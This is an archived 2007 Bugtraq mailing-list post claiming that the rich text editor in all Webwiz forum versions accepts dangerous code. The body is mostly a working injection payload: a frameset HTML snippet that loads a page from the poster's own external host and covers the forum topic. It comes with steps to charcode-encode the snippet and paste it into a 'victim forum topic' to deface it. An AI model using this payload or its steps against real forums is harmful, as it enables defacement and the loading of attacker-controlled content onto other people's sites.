lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Date: 11 Jun 2007 00:43:01 -0000 From: spymaster@...kod.net To: bugtraq@...urityfocus.com Subject: Webwiz vulnerable Webwiz vulnerable Versiyon: all versions are vulnerable Poc: it's vulnerable because of the rich text editor it accept codes which are dangerous When you hex this code with charcode it accept it and you can deface the topic anywhere using webwiz the code is this <frameset cols=100% rows=100% border=0 frameborder=0 framespacing=0> <frame frameborder=0 src=http://www.spykod.net/js/spy.html></frameset> hex it with charcode then save it as html then make ctrl a ctrl c after it paste it to victim forum topic : ) spymaster@...kod.net www.spykod.net
Powered by blists - more mailing lists